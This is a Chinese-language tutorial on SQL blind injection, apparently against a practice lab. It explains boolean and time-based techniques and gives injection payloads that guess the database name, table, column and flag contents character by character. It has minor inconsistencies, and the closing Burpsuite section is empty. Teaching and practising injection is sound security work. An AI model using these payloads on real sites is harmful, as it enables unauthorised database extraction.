• 一、盲注使用常见
  • （一）什么是盲注？
  • （二）盲注种类
    • 1、布尔盲注
    • 2、时间盲注
• 二、盲注函数解析
  • 1、length() 判断长度
  • 2、substr() 截取字符
  • 3、ascii() 进行ascii编码
  • 4、limit 0,1 限制输出位，只允许从1开始输出一位
  • 5、sleep() 休眠
  • 6、if(expr1,expr2,expr3) 判断语句
• 三、盲注演示
  • （一）猜解当前数据库名称长度
  • （二）猜解当前数据库名称
  • （三）猜表名
  • （四）猜字段名
  • （五）猜内容
• 四、盲注+Burpsuite

一、盲注使用常见

（一）什么是盲注？

有时目标存在注入，但在页面上没有任何回显，此时，我们需要利用一些方法进行判断或者尝试得到数据，这个过程称之为盲注。

（二）盲注种类

1、布尔盲注

布尔很明显Ture跟Fales，也就是说它只会根据你的注入信息返回Ture跟Fales，也就是没有了之前的报错信息。

2、时间盲注

界面返回值只有一种，Ture无论输入任何值，返回情况都会按正常的来处理。加入特定的时间函数，通过查看Web页面返回的时间差来判断注入的语句是否正确。

二、盲注函数解析

1、length() 判断长度

2、substr() 截取字符

3、ascii() 进行ascii编码

4、limit 0,1 限制输出位，只允许从1开始输出一位

5、sleep() 休眠

6、if(expr1,expr2,expr3) 判断语句

if(条件,条件成立执行,条件不成立执行)
第一位显示的是我们的条件
第二位是我们的条件成立后所执行的结果
第三位是我们条件不成立所执行的结果

三、盲注演示

（一）猜解当前数据库名称长度

and (length(database()))>9#

（二）猜解当前数据库名称

and (ascii(substr(database(),1,1)))=107 返回正常，说明数据库名称第一位是k

and substr(database(),1,1)='k' 返回正常，说明数据库名称第二位是k

（三）猜表名

and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6返回正常，说明当前数据库第一个表长度是6

and substr((select table_name from information_schema.tables where table_schema='kanwolongxia ' limit 0,1),1,1)='l'返回正常，说明数据库表名的第一个的第一位是l

（四）猜字段名

and substr((select column_name from information_schema.columns where table_name='loflag' limit 0,1),1,1)='i'返回正常，说明loflag表中的列名称第一位是i

（五）猜内容

and (ascii(substr(( select flaglo from loflag limit 0,1),1,1)))=122 返回正常，说明zKaQ列第一位是z

四、盲注+Burpsuite